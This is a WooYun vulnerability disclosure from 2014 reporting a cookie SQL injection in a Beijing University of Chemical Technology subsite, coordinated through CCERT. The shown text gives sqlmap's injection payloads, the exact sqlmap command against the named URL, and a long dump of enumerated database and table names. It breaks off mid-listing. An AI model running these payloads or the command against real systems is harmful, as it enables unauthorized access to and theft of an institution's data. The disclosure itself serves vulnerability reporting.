北京化工大学某分站#Cookie Injection | wooyun-2014-062145| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062145

漏洞标题：北京化工大学某分站#Cookie Injection

漏洞作者：从容

提交时间：2014-05-27 10:39

修复时间：2014-07-11 10:40

公开时间：2014-07-11 10:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-27：细节已通知厂商并且等待厂商处理中
2014-05-28：厂商已经确认，细节仅向厂商公开
2014-06-07：细节向核心白帽子及相关领域专家公开
2014-06-17：细节向普通白帽子公开
2014-06-27：细节向实习白帽子公开
2014-07-11：细节向公众公开

简要描述：

北京化工大学某分站#Cookie Injection

详细说明：

Cookie Injection地址：

http://jmyq.buct.edu.cn/www/DownloadShow.asp?ID=90

Cookie parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Place: Cookie
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=90 AND 4200=4200
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: ID=-7420 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(102)+CHAR(121)+CHAR(104)+CHAR(113)+CHAR(71)+CHAR(90)+CHAR(99)+CHAR(106)+CHAR(86)+CHAR(117)+CHAR(76)+CHAR(106)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(105)+CHAR(104)+CHAR(103)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---

漏洞证明：

#1、获取表段：

sqlmap -u http://jmyq.buct.edu.cn/www/DownloadShow.asp --cookie ID=90 --table --level 2

Database: pubs                                                                 
[19 tables]
+--------------------------------------------+
| S_ZJallbak                                 |
| S_ZJallbak                                 |
| authors                                    |
| diaocha                                    |
| discounts                                  |
| dtproperties                               |
| employee                                   |
| jobs                                       |
| pub_info                                   |
| publishers                                 |
| roysched                                   |
| sales                                      |
| stores                                     |
| sysconstraints                             |
| syssegments                                |
| titleauthor                                |
| titles                                     |
| titleview                                  |
| zj2012                                     |
+--------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: dnt31
[64 tables]
+--------------------------------------------+
| dnt_admingroups                            |
| dnt_adminvisitlog                          |
| dnt_advertisements                         |
| dnt_announcements                          |
| dnt_attachments                            |
| dnt_attachpaymentlog                       |
| dnt_attachtypes                            |
| dnt_banned                                 |
| dnt_bbcodes                                |
| dnt_bonuslog                               |
| dnt_creditslog                             |
| dnt_debatediggs                            |
| dnt_debates                                |
| dnt_failedlogins                           |
| dnt_favorites                              |
| dnt_forumfields                            |
| dnt_forumlinks                             |
| dnt_forums                                 |
| dnt_help                                   |
| dnt_invitation                             |
| dnt_locations                              |
| dnt_medalslog                              |
| dnt_medalslog                              |
| dnt_moderatormanagelog                     |
| dnt_moderators                             |
| dnt_myattachments                          |
| dnt_myposts                                |
| dnt_mytopics                               |
| dnt_navs                                   |
| dnt_notices                                |
| dnt_onlinelist                             |
| dnt_onlinelist                             |
| dnt_onlinetime                             |
| dnt_orders                                 |
| dnt_paymentlog                             |
| dnt_pms                                    |
| dnt_polloptions                            |
| dnt_polls                                  |
| dnt_postdebatefields                       |
| dnt_postid                                 |
| dnt_posts1                                 |
| dnt_ratelog                                |
| dnt_scheduledevents                        |
| dnt_searchcaches                           |
| dnt_smilies                                |
| dnt_statistics                             |
| dnt_stats                                  |
| dnt_statvars                               |
| dnt_tablelist                              |
| dnt_tags                                   |
| dnt_templates                              |
| dnt_topicidentify                          |
| dnt_topics                                 |
| dnt_topictagcaches                         |
| dnt_topictags                              |
| dnt_topictypes                             |
| dnt_trendstat                              |
| dnt_userfields                             |
| dnt_usergroups                             |
| dnt_users                                  |
| dnt_words                                  |
| dtproperties                               |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: dvbbs
[59 tables]
+--------------------------------------------+
| Dv_AdCode                                  |
| Dv_BbsLink                                 |
| Dv_BbsNews                                 |
| Dv_BestTopic                               |
| Dv_BlackolMenu                             |
| Dv_BoardPermission                         |
| Dv_BoardPermission                         |
| Dv_Boke_KeyWord                            |
| Dv_Boke_Post                               |
| Dv_Boke_Skins                              |
| Dv_Boke_SysCat                             |
| Dv_Boke_System                             |
| Dv_Boke_Topic                              |
| Dv_Boke_Upfile                             |
| Dv_Boke_UserCat                            |
| Dv_Boke_UserCat                            |
| Dv_Boke_UserSave                           |
| Dv_BookMark                                |
| Dv_ChallengeInfo                           |
| Dv_ChanOrders                              |
| Dv_Friend                                  |
| Dv_GroupName                               |
| Dv_Log                                     |
| Dv_Message                                 |
| Dv_MoneyLog                                |
| Dv_Online                                  |
| Dv_Plus_Tools_Buss                         |
| Dv_Plus_Tools_Buss                         |
| Dv_Plus_Tools_Info                         |
| Dv_Plus_Tools_MagicFace                    |
| Dv_Setup                                   |
| Dv_SmallPaper                              |
| Dv_Stylehelp                               |
| Dv_Stylehelp                               |
| Dv_TableList                               |
| Dv_Templates                               |
| Dv_Topic                                   |
| Dv_Upfile                                  |
| Dv_User1                                   |
| Dv_User1                                   |
| Dv_UserAccess                              |
| Dv_UserGroups                              |
| Dv_Vote                                    |
| Dv_VoteUser                                |
| Dv_admin                                   |
| Dv_help                                    |
| EC_ArgueList                               |
| EC_ArgueSpecial                            |
| EC_ArgueTopic                              |
| bank_User                                  |
| bank_config                                |
| bank_fuwu                                  |
| bank_log                                   |
| dtproperties                               |
| dv_bbs1                                    |
| ssosocom_add                               |
| ssosocom_system                            |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: ssoneu
[20 tables]
+--------------------------------------------+
| VIEW1                                      |
| bksjbxx                                    |
| dtproperties                               |
| jzgjbsjxx                                  |
| jzgjbxx                                    |
| sysconstraints                             |
| syssegments                                |
| unit1                                      |
| unit1                                      |
| yjsjbxx                                    |
| yxsdwjbxx                                  |
| ssoneu.C$_0jzgjbsjxx                       |
| ssoneu.E$_bksjbxx                          |
| ssoneu.E$_jzgjbsjxx                        |
| ssoneu.E$_jzgjbxx                          |
| ssoneu.E$_jzgxx                            |
| ssoneu.E$_unit                             |
| ssoneu.E$_yjsjbxx                          |
| ssoneu.E$_yxsdwjbxx                        |
| ssoneu.SNP_CHECK_TAB                       |
+--------------------------------------------+
Database: sb2013ls
[75 tables]
+--------------------------------------------+
| B_lb                                       |
| COLUMN_REFERENCE                           |
| S_BDK_dbf                                  |
| S_BDK_dbf                                  |
| S_FJ_dbf                                   |
| S_FJ_dbf                                   |
| S_FZJall                                   |
| S_FZJall                                   |
| S_GB                                       |
| S_GGYQ                                     |
| S_SBMK                                     |
| S_SY                                       |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_dbf                                   |
| S_ZJ_right                                 |
| S_ZJallbak                                 |
| S_ZJallbak                                 |
| S_ZMK                                      |
| TIME                                       |
| UserFuncInfo                               |
| VIEW1_bdk                                  |
| VIEW_dw                                    |
| backup_rz                                  |
| bbs                                        |
| bd_view                                    |
| cch_View                                   |
| cch_View                                   |
| dept_code                                  |
| district                                   |
| dizhi                                      |
| dtproperties                               |
| dw_bhgz                                    |
| dx1                                        |
| dx2                                        |
| emp_code                                   |
| internet                                   |
| location                                   |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1viewall                                 |
| mk1xz_view                                 |
| mk_cb                                      |
| mk_clbz                                    |
| mk_datatype                                |
| mk_dbf                                     |
| mk_dmdz                                    |
| mk_dwxz                                    |
| mk_gb                                      |
| mk_kmk                                     |
| question                                   |
| s_Dw_view                                  |
| s_Dw_view                                  |
| s_gbview                                   |
| s_jgsb                                     |
| s_jmsb                                     |
| s_lyr                                      |
| s_pjb                                      |
| s_ybsb                                     |
| s_zj_e                                     |
| s_zj_ls                                    |
| s_zjallviewds                              |
| s_zjcomm                                   |
| s_zjviewbf                                 |
| s_zjviewbf                                 |
| s_zjviewds                                 |
| sbmk_view                                  |
| sysconstraints                             |
| sysdate                                    |
| sysfunctioninfo                            |
| syssegments                                |
| ylgmxb                                     |
| ylgtjb                                     |
+--------------------------------------------+
Database: CheckReport
[17 tables]
+--------------------------------------------+
| Category                                   |
| Reports                                    |
| Roles                                      |
| Unit                                       |
| Usage                                      |
| Users                                      |
| VIEW1                                      |
| VIEW2                                      |
| department                                 |
| deviceCategory                             |
| deviceCategory                             |
| deviceMoneyFrom                            |
| dtproperties                               |
| sysconstraints                             |
| sysdiagrams                                |
| syssegments                                |
| dzgl.yxsdwjbxx                             |
+--------------------------------------------+
Database: msdb
[83 tables]
+--------------------------------------------+
| RTblClassDefs                              |
| RTblClassExtension                         |
| RTblDBMProps                               |
| RTblDBXProps                               |
| RTblDTMProps                               |
| RTblDTSProps                               |
| RTblDatabaseVersion                        |
| RTblEQMProps                               |
| RTblEnumerationDef                         |
| RTblEnumerationValueDef                    |
| RTblGENProps                               |
| RTblIfaceDefs                              |
| RTblIfaceHier                              |
| RTblIfaceMem                               |
| RTblMDSProps                               |
| RTblNamedObj                               |
| RTblOLPProps                               |
| RTblParameterDef                           |
| RTblPropDefs                               |
| RTblProps                                  |
| RTblRelColDefs                             |
| RTblRelshipDefs                            |
| RTblRelshipProps                           |
| RTblRelships                               |
| RTblSIMProps                               |
| RTblScriptDefs                             |
| RTblSites                                  |
| RTblSumInfo                                |
| RTblTFMProps                               |
| RTblTypeInfo                               |
| RTblTypeLibs                               |
| RTblUMLProps                               |
| RTblUMXProps                               |
| RTblVersionAdminInfo                       |
| RTblVersions                               |
| RTblWorkspaceItems                         |
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| log_shipping_databases                     |
| log_shipping_monitor                       |
| log_shipping_plan_databases                |
| log_shipping_plan_history                  |
| log_shipping_plans                         |
| log_shipping_primaries                     |
| log_shipping_secondaries                   |
| logmarkhistory                             |
| mswebtasks                                 |
| restorefilegroup                           |
| restorefilegroup                           |
| restorehistory                             |
| sqlagent_info                              |
| sysalerts                                  |
| syscachedcredentials                       |
| syscategories                              |
| sysconstraints                             |
| sysdbmaintplan_databases                   |
| sysdbmaintplan_history                     |
| sysdbmaintplan_jobs                        |
| sysdbmaintplans                            |
| sysdownloadlist                            |
| sysdtscategories                           |
| sysdtspackagelog                           |
| sysdtspackages                             |
| sysdtssteplog                              |
| sysdtstasklog                              |
| sysjobhistory                              |
| sysjobs_view                               |
| sysjobs_view                               |
| sysjobschedules                            |
| sysjobservers                              |
| sysjobsteps                                |
| sysnotifications                           |
| sysoperators                               |
| syssegments                                |
| systargetservergroupmembers                |
| systargetservergroups                      |
| systargetservers_view                      |
| systargetservers_view                      |
| systaskids                                 |
| systasks_view                              |
| systasks_view                              |
+--------------------------------------------+
Database: sb2013xj
[74 tables]
+--------------------------------------------+
| B_lb                                       |
| COLUMN_REFERENCE                           |
| S_BDK_dbf                                  |
| S_BDK_dbf                                  |
| S_FJ_dbf                                   |
| S_FJ_dbf                                   |
| S_FZJall                                   |
| S_FZJall                                   |
| S_GB                                       |
| S_GGYQ                                     |
| S_SBMK                                     |
| S_SY                                       |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_dbf                                   |
| S_ZJ_right                                 |
| S_ZJall                                    |
| S_ZMK                                      |
| TIME                                       |
| UserFuncInfo                               |
| VIEW1_bdk                                  |
| VIEW_dw                                    |
| backup_rz                                  |
| bbs                                        |
| bd_view                                    |
| cch_View                                   |
| cch_View                                   |
| dept_code                                  |
| district                                   |
| dizhi                                      |
| dtproperties                               |
| dw_bhgz                                    |
| dx1                                        |
| dx2                                        |
| emp_code                                   |
| internet                                   |
| location                                   |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1viewall                                 |
| mk1xz_view                                 |
| mk_cb                                      |
| mk_clbz                                    |
| mk_datatype                                |
| mk_dbf                                     |
| mk_dmdz                                    |
| mk_dwxz                                    |
| mk_gb                                      |
| mk_kmk                                     |
| question                                   |
| s_Dw_view                                  |
| s_Dw_view                                  |
| s_gbview                                   |
| s_jgsb                                     |
| s_jmsb                                     |
| s_lyr                                      |
| s_pjb                                      |
| s_ybsb                                     |
| s_zj_e                                     |
| s_zj_ls                                    |
| s_zjallviewds                              |
| s_zjcomm                                   |
| s_zjviewbf                                 |
| s_zjviewbf                                 |
| s_zjviewds                                 |
| sbmk_view                                  |
| sysconstraints                             |
| sysdate                                    |
| sysfunctioninfo                            |
| syssegments                                |
| ylgmxb                                     |
| ylgtjb                                     |
+--------------------------------------------+
Database: sb2007yy
[121 tables]
+--------------------------------------------+
| BBSXP_EventLog                             |
| BBSXP_FavoriteForums                       |
| BBSXP_FavoriteThreads                      |
| BBSXP_FavoriteUsers                        |
| BBSXP_ForumPermissions                     |
| BBSXP_Forums                               |
| BBSXP_Groups                               |
| BBSXP_Links                                |
| BBSXP_Menus                                |
| BBSXP_PostAttachments                      |
| BBSXP_PostRating                           |
| BBSXP_Posts                                |
| BBSXP_PrivateMessages                      |
| BBSXP_Ranks                                |
| BBSXP_Roles                                |
| BBSXP_SiteSettings                         |
| BBSXP_Statistics                           |
| BBSXP_Subscriptions                        |
| BBSXP_Threads                              |
| BBSXP_UserActivation                       |
| BBSXP_UserOnline                           |
| BBSXP_Users                                |
| BBSXP_Votes                                |
| B_lb                                       |
| COLUMN_REFERENCE                           |
| S_BDK_dbf                                  |
| S_BDK_dbf                                  |
| S_FJ_dbf                                   |
| S_FJ_dbf                                   |
| S_FZJall                                   |
| S_FZJall                                   |
| S_GB                                       |
| S_GGYQ                                     |
| S_SBMK                                     |
| S_SY                                       |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_dbf                                   |
| S_ZJ_right                                 |
| S_ZJall                                    |
| S_ZMK                                      |
| TIME                                       |
| UserFuncInfo                               |
| VIEW1_bdk                                  |
| VIEW_dw                                    |
| backup_rz                                  |
| bbs                                        |
| bd_view                                    |
| cch_View                                   |
| cch_View                                   |
| dept_code                                  |
| district                                   |
| dizhi                                      |
| dtproperties                               |
| dw_bhgz                                    |
| dx1                                        |
| dx2                                        |
| emp_code                                   |
| glsb                                       |
| glsbVIEW                                   |
| glyview                                    |
| guize                                      |
| internet_1                                 |
| internet_1                                 |
| internet_bak                               |
| jjyq                                       |
| location                                   |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1viewall                                 |
| mk1xz_view                                 |
| mk_cb                                      |
| mk_clbz                                    |
| mk_datatype                                |
| mk_dbf                                     |
| mk_dmdz                                    |
| mk_dwxz                                    |
| mk_gb                                      |
| mk_kmk                                     |
| mk_yy                                      |
| question                                   |
| registergly                                |
| registeruser                               |
| s_Dw_view                                  |
| s_Dw_view                                  |
| s_gbview                                   |
| s_jgsb                                     |
| s_jmsb                                     |
| s_lyr                                      |
| s_pjb                                      |
| s_ybsb                                     |
| s_zj_e                                     |
| s_zj_ls                                    |
| s_zjallviewds                              |
| s_zjcomm                                   |
| s_zjviewbf                                 |
| s_zjviewbf                                 |
| s_zjviewds                                 |
| sbmk_view                                  |
| shenhe_yy                                  |
| sysconstraints                             |
| sysdate                                    |
| sysfunctioninfo                            |
| syssegments                                |
| tb                                         |
| tmp                                        |
| wyyyview                                   |
| ylgmxb                                     |
| ylgtjb                                     |
| yycontent                                  |
| yyhistory                                  |
| yylmfviewgly1                              |
| yylmfviewgly1                              |
| yylmfviewgly1                              |
| yylmfviewgly2                              |
| yyresult                                   |
| yyviewnew1                                 |
| yyviewnew1                                 |
+--------------------------------------------+
Database: sb2014demo
[76 tables]
+--------------------------------------------+
| B_lb                                       |
| COLUMN_REFERENCE                           |
| ImageTable                                 |
| S_BDK_dbf                                  |
| S_BDK_dbf                                  |
| S_FJ_dbf                                   |
| S_FJ_dbf                                   |
| S_FZJall                                   |
| S_FZJall                                   |
| S_GB                                       |
| S_GGYQ                                     |
| S_SBMK                                     |
| S_SY                                       |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_dbf                                   |
| S_ZJ_right                                 |
| S_ZJall                                    |
| S_ZMK                                      |
| TIME                                       |
| UserFuncInfo                               |
| VIEW1_bdk                                  |
| VIEW_dw                                    |
| V_YQ_JBXX                                  |
| backup_rz                                  |
| bbs                                        |
| bd_view                                    |
| cch_View                                   |
| cch_View                                   |
| dept_code                                  |
| district                                   |
| dizhi                                      |
| dtproperties                               |
| dw_bhgz                                    |
| dx1                                        |
| dx2                                        |
| emp_code                                   |
| internet                                   |
| location                                   |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1viewall                                 |
| mk1xz_view                                 |
| mk_cb                                      |
| mk_clbz                                    |
| mk_datatype                                |
| mk_dbf                                     |
| mk_dmdz                                    |
| mk_dwxz                                    |
| mk_gb                                      |
| mk_kmk                                     |
| question                                   |
| s_Dw_view                                  |
| s_Dw_view                                  |
| s_gbview                                   |
| s_jgsb                                     |
| s_jmsb                                     |
| s_lyr                                      |
| s_pjb                                      |
| s_ybsb                                     |
| s_zj_e                                     |
| s_zj_ls                                    |
| s_zjallviewds                              |
| s_zjcomm                                   |
| s_zjviewbf                                 |
| s_zjviewbf                                 |
| s_zjviewds                                 |
| sbmk_view                                  |
| sysconstraints                             |
| sysdate                                    |
| sysfunctioninfo                            |
| syssegments                                |
| ylgmxb                                     |
| ylgtjb                                     |
+--------------------------------------------+
Database: gzcweb
[22 tables]
+--------------------------------------------+
| Admin                                      |
| BigClass_down                              |
| BigClass_down                              |
| Download                                   |
| Feedback                                   |
| News                                       |
| S_DW                                       |
| S_ZJall                                    |
| SmallClass_down                            |
| SmallClass_down                            |
| WebBasicInfo                               |
| book_setup                                 |
| dtproperties                               |
| eWebEditor_Button                          |
| eWebEditor_Style                           |
| eWebEditor_System                          |
| eWebEditor_ToolBar                         |
| gonggao                                    |
| shop_pinglun                               |
| sogo_link                                  |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: sysgl
[109 tables]
+--------------------------------------------+
| MKxmry1                                    |
| MKxmry1                                    |
| S_GB                                       |
| S_SBMK                                     |
| S_ZMK                                      |
| USERIGHT                                   |
| bbbb                                       |
| bbs                                        |
| bdzk                                       |
| cgjl                                       |
| clxzview                                   |
| dtproperties                               |
| emp_code                                   |
| gnjxnr                                     |
| gwjxnr                                     |
| hjdj                                       |
| lwjb                                       |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1xz_view                                 |
| mk2                                        |
| mk_datatype                                |
| mk_dbf                                     |
| mkmk1_view                                 |
| mkmk1_view                                 |
| mkmk1jfkm_view                             |
| mkmk1syfx_View                             |
| mkxmryview                                 |
| prqk                                       |
| question                                   |
| ry_view                                    |
| rylb                                       |
| rymcview1                                  |
| rymcview1                                  |
| ryview                                     |
| ryywview                                   |
| ryzlkview                                  |
| s_dw_view                                  |
| s_dw_view                                  |
| s_gbview                                   |
| s_zj_dbf                                   |
| sb_ry                                      |
| sb_xm                                      |
| sbmk_view                                  |
| sbxz_view                                  |
| sj6                                        |
| sj7                                        |
| sylb                                       |
| sylx                                       |
| sys_right                                  |
| sysconstraints                             |
| sysdate                                    |
| syssegments                                |
| syyq                                       |
| syzlb                                      |
| whcd                                       |
| wjtjbview                                  |
| wysp                                       |
| wyyz                                       |
| x_clzlk                                    |
| x_dwzlk                                    |
| x_jgsb                                     |
| x_jgsbv                                    |
| x_jgzlk                                    |
| x_kckn                                     |
| x_kckn                                     |
| x_kckzlkn                                  |
| x_kckzlkn                                  |
| x_mczlk                                    |
| x_rycctj                                   |
| x_rycctj                                   |
| x_rysb                                     |
| x_rysbv                                    |
| x_ryzlk                                    |
| x_sycl_print                               |
| x_sycl_print                               |
| x_sycl_view                                |
| x_syclview                                 |
| x_symc_view                                |
| x_symc_view                                |
| x_symcn                                    |
| x_symcview1                                |
| x_syxm                                     |
| x_xmcctj                                   |
| x_xmrytj                                   |
| x_xmsb                                     |
| x_xmsbv                                    |
| x_xmzlk                                    |
| x_zj_print                                 |
| x_zj_print                                 |
| x_zjview                                   |
| x_zjzlk                                    |
| x_zy                                       |
| xb                                         |
| xm_kaichu                                  |
| xm_view                                    |
| xmviewcard                                 |
| xmviewcard                                 |
| xmzlkview                                  |
| ylgmxb                                     |
| ylgmxb                                     |
| ylgtjb                                     |
| zygz                                       |
| zyzw                                       |
| zzjb                                       |
| zzry_view                                  |
| 管理员                                        |
+--------------------------------------------+
Database: master
[39 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| MSreplication_options                      |
| S_ZJall201212                              |
| dtproperties                               |
| resultcmd_cc                               |
| spt_datatype_info_ext                      |
| spt_datatype_info_ext                      |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_provider_types                         |
| spt_server_info                            |
| spt_values                                 |
| sysconstraints                             |
| syslogins                                  |
| sysoledbusers                              |
| sysopentapes                               |
| sysremotelogins                            |
| syssegments                                |
+--------------------------------------------+
Database: Northwind
[33 tables]
+--------------------------------------------+
| Categories                                 |
| CustomerCustomerDemo                       |
| CustomerDemographics                       |
| Customers                                  |
| EmployeeTerritories                        |
| Employees                                  |
| Invoices                                   |
| Region                                     |
| S_ZJ                                       |
| Shippers                                   |
| Suppliers                                  |
| Territories                                |
| Alphabetical list of products              |
| Category Sales for 1997                    |
| Current Product List                       |
| Customer and Suppliers by City             |
| Order Details Extended                     |
| Order Details Extended                     |
| Order Subtotals                            |
| Orders Qry                                 |
| Orders Qry                                 |
| Product Sales for 1997                     |
| Products Above Average Price               |
| Products Above Average Price               |
| Products by Category                       |
| Quarterly Orders                           |
| Sales Totals by Amount                     |
| Sales by Category                          |
| Summary of Sales by Quarter                |
| Summary of Sales by Year                   |
| dtproperties                               |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: oayaya
[23 tables]
+--------------------------------------------+
| Admin                                      |
| BigClass_down                              |
| BigClass_down                              |
| D99_CMD                                    |
| D99_Tmp                                    |
| Download                                   |
| Feedback                                   |
| News                                       |
| SmallClass_down                            |
| SmallClass_down                            |
| WebBasicInfo                               |
| book_setup                                 |
| dtproperties                               |
| eWebEditor_Button                          |
| eWebEditor_Style                           |
| eWebEditor_System                          |
| eWebEditor_ToolBar                         |
| gonggao                                    |
| shop_pinglun                               |
| sogo_link                                  |
| sqlmapoutput                               |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: tempsb
[90 tables]
+--------------------------------------------+
| B_lb                                       |
| COLUMN_REFERENCE                           |
| ImageTable                                 |
| S_BDK_dbf                                  |
| S_BDK_dbf                                  |
| S_FJ_dbf                                   |
| S_FJ_dbf                                   |
| S_FZJall                                   |
| S_FZJall                                   |
| S_GB                                       |
| S_GGYQ                                     |
| S_SBMK                                     |
| S_SY                                       |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_dbf                                   |
| S_ZJ_right                                 |
| S_ZJall                                    |
| S_ZMK                                      |
| TIME                                       |
| UserFuncInfo                               |
| VIEW1_bdk                                  |
| VIEW_dw                                    |
| V_YQ_JBXX                                  |
| backup_rz                                  |
| bbs                                        |
| bd_view                                    |
| cch_View                                   |
| cch_View                                   |
| changyong                                  |
| dept_code                                  |
| district                                   |
| dizhi                                      |
| dizhiview                                  |
| dizhiwview                                 |
| dtproperties                               |
| dw_bhgz                                    |
| dx1                                        |
| dx2                                        |
| emp_code                                   |
| internet                                   |
| jiajuview                                  |
| jiajuwview                                 |
| jzgjbsjxx                                  |
| leader_1                                   |
| leader_2                                   |
| leader_3                                   |
| leader_4                                   |
| leader_5                                   |
| location                                   |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1viewall                                 |
| mk1xz_view                                 |
| mk_cb                                      |
| mk_clbz                                    |
| mk_datatype                                |
| mk_dbf                                     |
| mk_dmdz                                    |
| mk_dwxz                                    |
| mk_gb                                      |
| mk_kmk                                     |
| question                                   |
| s_Dw_view                                  |
| s_Dw_view                                  |
| s_gbview                                   |
| s_jgsb                                     |
| s_jmsb                                     |
| s_lyr                                      |
| s_pjb                                      |
| s_ybsb                                     |
| s_zj_e                                     |
| s_zj_ls                                    |
| s_zjallviewds                              |
| s_zjcomm                                   |
| s_zjviewbf                                 |
| s_zjviewbf                                 |
| s_zjviewds                                 |
| sbmk_view                                  |
| sysconstraints                             |
| sysdate                                    |
| sysfunctioninfo                            |
| syssegments                                |
| wt_user                                    |
| ylgmxb                                     |
| ylgtjb                                     |
| zcview                                     |
| zcwview                                    |
+--------------------------------------------+
Database: xmry
[113 tables]
+--------------------------------------------+
| MKxmry1                                    |
| MKxmry1                                    |
| S_GB                                       |
| S_SBMK                                     |
| S_ZMK                                      |
| USERIGHT                                   |
| aA                                         |
| bbbb                                       |
| bbs                                        |
| bdzk                                       |
| cgjl                                       |
| clxzview                                   |
| dtproperties                               |
| emp_code                                   |
| gnjxnr                                     |
| gwjxnr                                     |
| hjdj                                       |
| lwjb                                       |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1xz_view                                 |
| mk2                                        |
| mk_datatype                                |
| mk_dbf                                     |
| mkmk1_view                                 |
| mkmk1_view                                 |
| mkmk1jfkm_view                             |
| mkmk1syfx_View                             |
| mkxmryview                                 |
| prqk                                       |
| question                                   |
| ry_view                                    |
| rylb                                       |
| rymcview1                                  |
| rymcview1                                  |
| ryview                                     |
| ryywview                                   |
| ryzlkview                                  |
| s_dw_view                                  |
| s_dw_view                                  |
| s_gbview                                   |
| s_zj_dbf                                   |
| sb_ry                                      |
| sb_xm                                      |
| sbmk_view                                  |
| sbxz_view                                  |
| sj6                                        |
| sj7                                        |
| sylb                                       |
| sylx                                       |
| sys_right                                  |
| sysconstraints                             |
| sysdate                                    |
| syssegments                                |
| syyq                                       |
| syzlb                                      |
| whcd                                       |
| wjtjbview                                  |
| wysp                                       |
| wyyz                                       |
| x_clzlk                                    |
| x_dwzlk                                    |
| x_jgsb                                     |
| x_jgsbv                                    |
| x_jgzlk                                    |
| x_kckn                                     |
| x_kckn                                     |
| x_kckzlkn                                  |
| x_kckzlkn                                  |
| x_mczlk                                    |
| x_rycctj                                   |
| x_rycctj                                   |
| x_rysb                                     |
| x_rysbv                                    |
| x_ryzlk                                    |
| x_sycl_print                               |
| x_sycl_print                               |
| x_sycl_view                                |
| x_syclview                                 |
| x_symc_view                                |
| x_symc_view                                |
| x_symcn                                    |
| x_symcview1                                |
| x_syxm                                     |
| x_xmcctj                                   |
| x_xmrytj                                   |
| x_xmsb                                     |
| x_xmsbv                                    |
| x_xmzlk                                    |
| x_zj_print                                 |
| x_zj_print                                 |
| x_zjview                                   |
| x_zjzlk                                    |
| x_zy                                       |
| xb                                         |
| xm_kaichu                                  |
| xm_view                                    |
| xmviewcard                                 |
| xmviewcard                                 |
| xmzlkview                                  |
| ylgmxb                                     |
| ylgmxb                                     |
| ylgtjb                                     |
| zb                                         |
| zygz                                       |
| zyzw                                       |
| zzjb                                       |
| zzry_view                                  |
| 张勇                                         |
| 管理员                                        |
| 结构                                         |
+--------------------------------------------+
Database: sb20110426
[95 tables]
+--------------------------------------------+
| B_lb                                       |
| COLUMN_REFERENCE                           |
| ImageTable                                 |
| S_BDK_dbf                                  |
| S_BDK_dbf                                  |
| S_FJ_dbf                                   |
| S_FJ_dbf                                   |
| S_FZJall                                   |
| S_FZJall                                   |
| S_GB                                       |
| S_GGYQ                                     |
| S_SBMK                                     |
| S_SY                                       |
| S_ZJ_comm                                  |
| S_ZJ_comm                                  |
| S_ZJ_dbf                                   |
| S_ZJ_right                                 |
| S_ZJall2011                                |
| S_ZJall2011                                |
| S_ZMK                                      |
| TIME                                       |
| UserFuncInfo                               |
| VIEW1333                                   |
| VIEW1_bdk                                  |
| VIEW_dw                                    |
| V_YQ_JBXX                                  |
| backup_rz                                  |
| bbs                                        |
| bd_view                                    |
| cch_View                                   |
| cch_View                                   |
